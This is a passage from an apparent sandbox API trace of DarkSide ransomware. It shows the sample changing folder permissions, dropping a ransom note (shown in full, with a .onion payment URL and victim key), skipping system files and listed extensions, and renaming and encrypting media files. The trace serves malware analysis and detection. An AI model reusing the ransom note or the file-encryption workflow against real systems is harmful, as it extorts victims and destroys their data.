_Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\*" [0160.187] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\*") returned 0x30 [0160.187] wcscpy (in: _Dest=0x32200ae, _Source="lNiXwvZG3UHVD9Kw D Q" | out: _Dest="lNiXwvZG3UHVD9Kw D Q") returned="lNiXwvZG3UHVD9Kw D Q" [0160.188] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3240060 [0160.188] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3250068 [0160.188] wcscpy (in: _Dest=0x3240060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q" [0160.188] GetNamedSecurityInfoW () returned 0x0 [0160.189] SetEntriesInAclW () returned 0x0 [0160.189] SetNamedSecurityInfoW () returned 0x0 [0160.196] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x22bc08) returned 1 [0160.196] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x32e66c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0160.196] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\lnixwvzg3uhvd9kw d q")) returned 1 [0160.196] strlen (_Str="----------- [ Welcome to DarkSide - I-D Foods Corporation] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/LYID3U99RAJSTEYEFWS6SLYDGMUXKNAT3OPKN9D56PIGX1QHBU5DHGUN4HGMX2IW \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n 9NtjyWHbqWYTbhBpJ2ht4tKo7DQgTGmQ4IGHCFvgjiSMTNopVgQ9YIh9KRWkQgmvxviZtJGOakzykMzWKRgxwf2pCxpdMT8iGlKcsSOsxVOUXIGEgpy6tLqliTTEKWnohcYOhCF3DYMePMxEYa0eCmED1EXEG5QOZCpmkgDl5s5VSUF5uhnKsunUtKGS24iEAr2hxsJ1zMcMHmKVrf3bvRyhYVKXwlXVggxE7ncowldcK3v3CiKC24jKVd6OH5QrhVyyQLrFM5RE3Y0RcTeRTIqf1J5CIEhTiG3TH7SEpws4wfkt9RZ7rBWT4n3B69Z9JuPzyFCBwPKF7gTzEYzixIGzFbJyLSZXff9ryv3yL3JeKywAcoBafos0dLSkRgf1X1a1S2ud4kXa5GRU4W7rhCQsnJ8vAcv1AXaPRq9ESySBWQdGCQMSci0ex0oE4EfCDW3jjyXtaPofqNFhibodJFmOyTKwie1OcW6Kh6Ih6JxXXfUXr4VbRILzsiPXsOTTisDaEicID1E0SJRluBus2UhPyogJiZ7UpmUu9LUe3yAi3Bhox3pLv8E \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0x7ca [0160.196] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\lnixwvzg3uhvd9kw d q\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0160.196] WriteFile (in: hFile=0x1bc, lpBuffer=0x17dc98*, nNumberOfBytesToWrite=0x7ca, lpNumberOfBytesWritten=0x32e63c, lpOverlapped=0x0 | out: lpBuffer=0x17dc98*, lpNumberOfBytesWritten=0x32e63c*=0x7ca, lpOverlapped=0x0) returned 1 [0160.197] CloseHandle (hObject=0x1bc) returned 1 [0160.198] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0160.198] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\lnixwvzg3uhvd9kw d q")) returned 0x10 [0160.198] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\") returned="" [0160.198] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\") returned 0x44 [0160.198] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\*", fInfoLevelId=0x0, lpFindFileData=0x32e89c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32e89c) returned 0x1541c8 [0160.198] FindNextFileW (in: hFindFile=0x1541c8, lpFindFileData=0x32e89c | out: lpFindFileData=0x32e89c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc5a28240, ftCreationTime.dwHighDateTime=0x1d5ddf7, ftLastAccessTime.dwLowDateTime=0x8d2f2ac0, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x8d2f2ac0, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0160.200] FindNextFileW (in: hFindFile=0x1541c8, lpFindFileData=0x32e89c | out: lpFindFileData=0x32e89c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3330380, ftCreationTime.dwHighDateTime=0x1d5dd96, ftLastAccessTime.dwLowDateTime=0x9420c100, ftLastAccessTime.dwHighDateTime=0x1d5e324, ftLastWriteTime.dwLowDateTime=0x9420c100, ftLastWriteTime.dwHighDateTime=0x1d5e324, nFileSizeHigh=0x0, nFileSizeLow=0x5958, dwReserved0=0x0, dwReserved1=0x0, cFileName="4_Vh_vo1hZHfJ--tWdw.mp3", cAlternateFileName="4_VH_V~1.MP3")) returned 1 [0160.200] _wcsicmp (_Str1="4_Vh_vo1hZHfJ--tWdw.mp3", _Str2="README.c06622a1.TXT") returned -62 [0160.200] wcsstr (_Str="4_Vh_vo1hZHfJ--tWdw.mp3", _SubStr="README") returned 0x0 [0160.200] _wcsicmp (_Str1="autorun.inf", _Str2="4_Vh_vo1hZHfJ--tWdw.mp3") returned 45 [0160.200] wcslen (_String="autorun.inf") returned 0xb [0160.200] _wcsicmp (_Str1="boot.ini", _Str2="4_Vh_vo1hZHfJ--tWdw.mp3") returned 46 [0160.200] wcslen (_String="boot.ini") returned 0x8 [0160.200] _wcsicmp (_Str1="bootfont.bin", _Str2="4_Vh_vo1hZHfJ--tWdw.mp3") returned 46 [0160.200] wcslen (_String="bootfont.bin") returned 0xc [0160.200] _wcsicmp (_Str1="bootsect.bak", _Str2="4_Vh_vo1hZHfJ--tWdw.mp3") returned 46 [0160.200] wcslen (_String="bootsect.bak") returned 0xc [0160.200] _wcsicmp (_Str1="desktop.ini", _Str2="4_Vh_vo1hZHfJ--tWdw.mp3") returned 48 [0160.200] wcslen (_String="desktop.ini") returned 0xb [0160.200] _wcsicmp (_Str1="iconcache.db", _Str2="4_Vh_vo1hZHfJ--tWdw.mp3") returned 53 [0160.200] wcslen (_String="iconcache.db") returned 0xc [0160.200] _wcsicmp (_Str1="ntldr", _Str2="4_Vh_vo1hZHfJ--tWdw.mp3") returned 58 [0160.201] wcslen (_String="ntldr") returned 0x5 [0160.201] _wcsicmp (_Str1="ntuser.dat", _Str2="4_Vh_vo1hZHfJ--tWdw.mp3") returned 58 [0160.201] wcslen (_String="ntuser.dat") returned 0xa [0160.201] _wcsicmp (_Str1="ntuser.dat.log", _Str2="4_Vh_vo1hZHfJ--tWdw.mp3") returned 58 [0160.201] wcslen (_String="ntuser.dat.log") returned 0xe [0160.201] _wcsicmp (_Str1="ntuser.ini", _Str2="4_Vh_vo1hZHfJ--tWdw.mp3") returned 58 [0160.201] wcslen (_String="ntuser.ini") returned 0xa [0160.201] _wcsicmp (_Str1="thumbs.db", _Str2="4_Vh_vo1hZHfJ--tWdw.mp3") returned 64 [0160.201] wcslen (_String="thumbs.db") returned 0x9 [0160.201] _wcsicmp (_Str1="386", _Str2="mp3") returned -58 [0160.201] wcslen (_String="386") returned 0x3 [0160.201] _wcsicmp (_Str1="adv", _Str2="mp3") returned -12 [0160.201] wcslen (_String="adv") returned 0x3 [0160.201] _wcsicmp (_Str1="ani", _Str2="mp3") returned -12 [0160.201] wcslen (_String="ani") returned 0x3 [0160.201] _wcsicmp (_Str1="bat", _Str2="mp3") returned -11 [0160.201] wcslen (_String="bat") returned 0x3 [0160.201] _wcsicmp (_Str1="bin", _Str2="mp3") returned -11 [0160.201] wcslen (_String="bin") returned 0x3 [0160.201] _wcsicmp (_Str1="cab", _Str2="mp3") returned -10 [0160.201] wcslen (_String="cab") returned 0x3 [0160.201] _wcsicmp (_Str1="cmd", _Str2="mp3") returned -10 [0160.201] wcslen (_String="cmd") returned 0x3 [0160.202] _wcsicmp (_Str1="com", _Str2="mp3") returned -10 [0160.202] wcslen (_String="com") returned 0x3 [0160.202] _wcsicmp (_Str1="cpl", _Str2="mp3") returned -10 [0160.202] wcslen (_String="cpl") returned 0x3 [0160.202] _wcsicmp (_Str1="cur", _Str2="mp3") returned -10 [0160.202] wcslen (_String="cur") returned 0x3 [0160.202] _wcsicmp (_Str1="deskthemepack", _Str2="mp3") returned -9 [0160.202] wcslen (_String="deskthemepack") returned 0xd [0160.202] _wcsicmp (_Str1="diagcab", _Str2="mp3") returned -9 [0160.202] wcslen (_String="diagcab") returned 0x7 [0160.202] _wcsicmp (_Str1="diagcfg", _Str2="mp3") returned -9 [0160.202] wcslen (_String="diagcfg") returned 0x7 [0160.202] _wcsicmp (_Str1="diagpkg", _Str2="mp3") returned -9 [0160.202] wcslen (_String="diagpkg") returned 0x7 [0160.202] _wcsicmp (_Str1="dll", _Str2="mp3") returned -9 [0160.202] wcslen (_String="dll") returned 0x3 [0160.202] _wcsicmp (_Str1="drv", _Str2="mp3") returned -9 [0160.203] wcslen (_String="drv") returned 0x3 [0160.203] _wcsicmp (_Str1="exe", _Str2="mp3") returned -8 [0160.203] wcslen (_String="exe") returned 0x3 [0160.203] _wcsicmp (_Str1="hlp", _Str2="mp3") returned -5 [0160.203] wcslen (_String="hlp") returned 0x3 [0160.203] _wcsicmp (_Str1="icl", _Str2="mp3") returned -4 [0160.203] wcslen (_String="icl") returned 0x3 [0160.203] _wcsicmp (_Str1="icns", _Str2="mp3") returned -4 [0160.203] wcslen (_String="icns") returned 0x4 [0160.203] _wcsicmp (_Str1="ico", _Str2="mp3") returned -4 [0160.203] wcslen (_String="ico") returned 0x3 [0160.203] _wcsicmp (_Str1="ics", _Str2="mp3") returned -4 [0160.203] wcslen (_String="ics") returned 0x3 [0160.203] _wcsicmp (_Str1="idx", _Str2="mp3") returned -4 [0160.203] wcslen (_String="idx") returned 0x3 [0160.203] _wcsicmp (_Str1="ldf", _Str2="mp3") returned -1 [0160.203] wcslen (_String="ldf") returned 0x3 [0160.204] _wcsicmp (_Str1="lnk", _Str2="mp3") returned -1 [0160.204] wcslen (_String="lnk") returned 0x3 [0160.204] _wcsicmp (_Str1="mod", _Str2="mp3") returned -1 [0160.204] wcslen (_String="mod") returned 0x3 [0160.204] _wcsicmp (_Str1="mpa", _Str2="mp3") returned 46 [0160.204] wcslen (_String="mpa") returned 0x3 [0160.204] _wcsicmp (_Str1="msc", _Str2="mp3") returned 3 [0160.204] wcslen (_String="msc") returned 0x3 [0160.204] _wcsicmp (_Str1="msp", _Str2="mp3") returned 3 [0160.204] wcslen (_String="msp") returned 0x3 [0160.204] _wcsicmp (_Str1="msstyles", _Str2="mp3") returned 3 [0160.204] wcslen (_String="msstyles") returned 0x8 [0160.204] _wcsicmp (_Str1="msu", _Str2="mp3") returned 3 [0160.204] wcslen (_String="msu") returned 0x3 [0160.204] _wcsicmp (_Str1="nls", _Str2="mp3") returned 1 [0160.204] wcslen (_String="nls") returned 0x3 [0160.204] _wcsicmp (_Str1="nomedia", _Str2="mp3") returned 1 [0160.204] wcslen (_String="nomedia") returned 0x7 [0160.204] _wcsicmp (_Str1="ocx", _Str2="mp3") returned 2 [0160.205] wcslen (_String="ocx") returned 0x3 [0160.205] _wcsicmp (_Str1="prf", _Str2="mp3") returned 3 [0160.205] wcslen (_String="prf") returned 0x3 [0160.205] _wcsicmp (_Str1="ps1", _Str2="mp3") returned 3 [0160.205] wcslen (_String="ps1") returned 0x3 [0160.205] _wcsicmp (_Str1="rom", _Str2="mp3") returned 5 [0160.205] wcslen (_String="rom") returned 0x3 [0160.205] _wcsicmp (_Str1="rtp", _Str2="mp3") returned 5 [0160.205] wcslen (_String="rtp") returned 0x3 [0160.205] _wcsicmp (_Str1="scr", _Str2="mp3") returned 6 [0160.205] wcslen (_String="scr") returned 0x3 [0160.205] _wcsicmp (_Str1="shs", _Str2="mp3") returned 6 [0160.205] wcslen (_String="shs") returned 0x3 [0160.205] _wcsicmp (_Str1="spl", _Str2="mp3") returned 6 [0160.205] wcslen (_String="spl") returned 0x3 [0160.205] _wcsicmp (_Str1="sys", _Str2="mp3") returned 6 [0160.205] wcslen (_String="sys") returned 0x3 [0160.205] _wcsicmp (_Str1="theme", _Str2="mp3") returned 7 [0160.205] wcslen (_String="theme") returned 0x5 [0160.205] _wcsicmp (_Str1="themepack", _Str2="mp3") returned 7 [0160.206] wcslen (_String="themepack") returned 0x9 [0160.206] _wcsicmp (_Str1="wpx", _Str2="mp3") returned 10 [0160.206] wcslen (_String="wpx") returned 0x3 [0160.206] _wcsicmp (_Str1="lock", _Str2="mp3") returned -1 [0160.206] wcslen (_String="lock") returned 0x4 [0160.206] _wcsicmp (_Str1="key", _Str2="mp3") returned -2 [0160.206] wcslen (_String="key") returned 0x3 [0160.206] _wcsicmp (_Str1="hta", _Str2="mp3") returned -5 [0160.206] wcslen (_String="hta") returned 0x3 [0160.206] _wcsicmp (_Str1="msi", _Str2="mp3") returned 3 [0160.206] wcslen (_String="msi") returned 0x3 [0160.206] _wcsicmp (_Str1="pdb", _Str2="mp3") returned 3 [0160.206] wcslen (_String="pdb") returned 0x3 [0160.206] _wcsicmp (_Str1="sqlite", _Str2="mp3") returned 6 [0160.206] wcslen (_String="sqlite") returned 0x6 [0160.206] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\lnixwvzg3uhvd9kw d q")) returned 0x10 [0160.206] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3272078 [0160.207] wcscpy (in: _Dest=0x3272078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q" [0160.207] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q") returned 0x43 [0160.207] wcscpy (in: _Dest=0x3272100, _Source="4_Vh_vo1hZHfJ--tWdw.mp3" | out: _Dest="4_Vh_vo1hZHfJ--tWdw.mp3") returned="4_Vh_vo1hZHfJ--tWdw.mp3" [0160.207] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\4_Vh_vo1hZHfJ--tWdw.mp3", dwFileAttributes=0x80) returned 1 [0160.207] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\4_Vh_vo1hZHfJ--tWdw.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\lnixwvzg3uhvd9kw d q\\4_vh_vo1hzhfj--twdw.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0160.207] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0160.207] ReadFile (in: hFile=0x1f0, lpBuffer=0x32e724, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32e7b4, lpOverlapped=0x0 | out: lpBuffer=0x32e724*, lpNumberOfBytesRead=0x32e7b4*=0x90, lpOverlapped=0x0) returned 1 [0160.208] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e724, Length=0x80) returned 0xbacab79e [0160.208] RtlComputeCrc32 (PartialCrc=0xb79e, Buffer=0x32e724, Length=0x80) returned 0x38edc44a [0160.208] RtlComputeCrc32 (PartialCrc=0xc44a, Buffer=0x32e724, Length=0x80) returned 0x36dc5eb4 [0160.208] RtlComputeCrc32 (PartialCrc=0x5eb4, Buffer=0x32e724, Length=0x80) returned 0xe1c32146 [0160.208] RtlComputeCrc32 (PartialCrc=0x2146, Buffer=0x32e724, Length=0x80) returned 0x72f267b1 [0160.208] CloseHandle (hObject=0x1f0) returned 1 [0160.209] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3282080 [0160.209] wcscpy (in: _Dest=0x3282080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\4_Vh_vo1hZHfJ--tWdw.mp3" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\4_Vh_vo1hZHfJ--tWdw.mp3") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\4_Vh_vo1hZHfJ--tWdw.mp3" [0160.209] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\4_Vh_vo1hZHfJ--tWdw.mp3") returned 0x5b [0160.209] wcscpy (in: _Dest=0x3282136, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0160.209] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\4_Vh_vo1hZHfJ--tWdw.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\lnixwvzg3uhvd9kw d q\\4_vh_vo1hzhfj--twdw.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\4_Vh_vo1hZHfJ--tWdw.mp3.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\lnixwvzg3uhvd9kw d q\\4_vh_vo1hzhfj--twdw.mp3.c06622a1"), dwFlags=0x8) returned 1 [0160.212] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\lNiXwvZG3UHVD9Kw D Q\\4_Vh_vo1hZHfJ--tWdw.mp3.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\lnixwvzg3uhvd9kw d q\\4_vh_vo1hzhfj--twdw.mp3.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1f0 [0160.212] CreateIoCompletionPort (FileHandle=0x1f0, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0160.212] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3900020 [0160.222] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xca6b0a8 [0160.222] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x36a40c50 [0160.222] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3d7e310a [0160.222] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2c2f5d [0160.222] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2bf889df [0160.222] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5deec954 [0160.222] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x214cc538 [0160.222] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6535d7ce [0160.225] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3900094, Length=0x80) returned 0xbdb647d3 [0160.225] RtlComputeCrc32 (PartialCrc=0x47d3, Buffer=0x3900094, Length=0x80) returned 0x2acc09cd [0160.225] RtlComputeCrc32 (PartialCrc=0x9cd, Buffer=0x3900094, Length=0x80) returned 0x8dd68ee1 [0160.225] RtlComputeCrc32 (PartialCrc=0x8ee1, Buffer=0x3900094, Length=0x80) returned 0xf8e2e383 [0160.225] RtlComputeCrc32 (PartialCrc=0xe383, Buffer=0x3900094, Length=0x80) returned 0x76851339 [0160.225] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3900020) returned 1 [0160.226] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3272078) returned 1 [0160.226] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3282080) returned 1 [0160.226] FindNextFileW (in: hFindFile=0x1541c8, lpFindFileData=0x32e89c | out: lpFindFileData=0x32e89c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x323df800, ftCreationTime.dwHighDateTime=0x1d5ddec, ftLastAccessTime.dwLowDateTime=0x881b6fb0, ftLastAccessTime.dwHighDateTime=0x1d5dd96, ftLastWriteTime.dwLowDateTime=0x881b6fb0, ftLastWriteTime.dwHighDateTime=0x1d5dd96, nFileSizeHigh=0x0, nFileSizeLow=0x13305, dwReserved0=0x0, dwReserved1=0x0, cFileName="adSqbHw.m4a", cAlternateFileName="")) returned 1 [0160.226] _wcsicmp (_Str1="adSqbHw.m4a", _Str2="README.c06622a1.TXT") returned -17 [0160.226] wcsstr (_Str="adSqbHw.m4a", _SubStr="README") returned 0x0 [0160.226] _wcsicmp (_Str1="autorun.inf", _Str2="adSqbHw.m4a") returned 17 [0160.226] wcslen (_String="autorun.inf") returned 0xb [0160.226] _wcsicmp (_Str1="boot.ini", _Str2="adSqbHw.m4a") returned 1 [0160.226] wcslen (_String="boot.ini") returned 0x8 [0160.226] _wcsicmp (_Str1="bootfont.bin", _Str2="adSqbHw.m4a") returned 1 [0160.226] wcslen (_String="bootfont.bin") returned 0xc [0160.226] _wcsicmp (_Str1="bootsect.bak", _Str2="adSqbHw.m4a") returned 1 [0160.226] wcslen (_String="bootsect.bak") returned 0xc [0160.226] _wcsicmp (_Str1="desktop.ini", _Str2="adSqbHw.m4a") returned 3 [0160.226] wcslen (_String="desktop.ini") returned 0xb [0160.226] _wcsicmp (_Str1="iconcache.db", _Str2="adSqbHw.m4a") returned 8 [0160.226] wcslen (_String="iconcache.db") returned 0xc [0160.226] _wcsicmp (_Str1="ntldr", _Str2="adSqbHw.m4a") returned 13 [0160.226] wcslen (_String="ntldr") returned 0x5 [0160.226] _wcsicmp (_Str1="ntuser.dat", _Str2="adSqbHw.m4a") returned 13 [0160.226] wcslen (_String="ntuser.dat") returned 0xa [0160.226] _wcsicmp (_Str1="ntuser.dat.log", _Str2="adSqbHw.m4a") returned 13 [0160.226] wcslen (_String="ntuser.dat.log") returned 0xe [0160.227] _wcsicmp (_Str1="ntuser.ini", _Str2="adSqbHw.m4a") returned 13 [0160.227] wcslen (_String="ntuser.ini") returned 0xa [0160.227] _wcsicmp (_Str1="thumbs.db", _Str2="adSqbHw.m4a") returned 19 [0160.227] wcslen (_String="thumbs.db") returned 0x9 [0160.227] _wcsicmp (_Str1="386", _Str2="m4a") returned -58 [0160.227] wcslen (_String="386") returned 0x3 [0160.227] _wcsicmp (_Str1="adv", _Str2="m4a") returned -12 [0160.227] wcslen (_String="adv") returned 0x3 [0160.227] _wcsicmp (_Str1="ani", _Str2="m4a") returned -12 [0160.227] wcslen (_String="ani") returned 0x3 [0160.227] _wcsicmp (_Str1="bat", _Str2="m4a") returned -11 [0160.227] wcslen (_String="bat") returned 0x3 [0160.227] _wcsicmp (_Str1="bin", _Str2="m4a") returned -11 [0160.227] wcslen (_String="bin") returned 0x3 [0160.227] _wcsicmp (_Str1="cab", _Str2="m4a") returned -10 [0160.227] wcslen (_String="cab") returned 0x3 [0160.227] _wcsicmp (_Str1="cmd", _Str2="m4a") returned -10 [0160.227] wcslen (_String="cmd") returned 0x3 [0160.227] _wcsicmp (_Str1="com", _Str2="m4a") returned -10 [0160.227] wcslen (_String="com") returned 0x3 [0160.227] _wcsicmp (_Str1="cpl", _Str2="m4a") returned -10 [0160.227] wcslen (_String="cpl") returned 0x3 [0160.227] _wcsicmp (_Str1="cur", _Str2="m4a") returned -10 [0160.227] wcslen (_String="cur") returned 0x3 [0160.227] _wcsicmp (_Str1="deskthemepack", _Str2="m4a") returned -9 [0160.227] wcslen (_String="deskthemepack") returned 0xd [0160.227] _wcsicmp (_Str1="diagcab", _Str2="m4a") returned -9 [0160.228] wcslen (_String="diagcab") returned 0x7 [0160.228] _wcsicmp (_Str1="diagcfg", _Str2="m4a") returned -9 [0160.228] wcslen (_String="diagcfg") returned 0x7 [0160.228] _wcsicmp (_Str1="diagpkg", _Str2="m4a") returned -9 [0160.228] wcslen (_String="diagpkg") returned 0x7 [0160.228] _wcsicmp (_Str1="dll", _Str2="m4a") returned -9 [0160.228] wcslen (_String="dll") returned 0x3 [0160.228] _wcsicmp (_Str1="drv", _Str2="m4a") returned -9 [0160.228] wcslen (_String="drv") returned 0x3 [0160.228] _wcsicmp (_Str1="exe", _Str2="m4a") returned -8 [0160.228] wcslen (_String="exe") returned 0x3 [0160.228] _wcsicmp (_Str1="hlp", _Str2="m4a") returned -5 [0160.228] wcslen (_String="hlp") returned 0x3 [0160.228] _wcsicmp (_Str1="icl", _Str2="m4a") returned -4 [0160.228] wcslen (_String="icl") returned 0x3 [0160.228] _wcsicmp (_Str1="icns", _Str2="m4a") returned -4 [0160.228] wcslen (_String="icns") returned 0x4 [0160.228] _wcsicmp (_Str1="ico", _Str2="m4a") returned -4 [0160.228] wcslen (_String="ico") returned 0x3 [0160.228] _wcsicmp (_Str1="ics", _Str2="m4a") returned -4 [0160.228] wcslen (_String="ics") returned 0x3 [0160.228] _wcsicmp (_Str1="idx", _Str2="m4a") returned -4 [0160.228] wcslen (_String="idx") returned 0x3 [0160.228] _wcsicmp (_Str1="ldf", _Str2="m4a") returned -1 [0160.228] wcslen (_String="ldf") returned 0x3 [0160.228] _wcsicmp (_Str1="lnk", _Str2="m4a") returned -1 [0160.228] wcslen (_String="lnk") returned 0x3 [0160.229] _wcsicmp (_Str1="mod", _Str2="m4a") returned 59 [0160.229] wcslen (_String="mod") returned 0x3 [0160.229] _wcsicmp (_Str1="mpa", _Str2="m4a") returned 60 [0160.229] wcslen (_String="mpa") returned 0x3 [0160.229] _wcsicmp 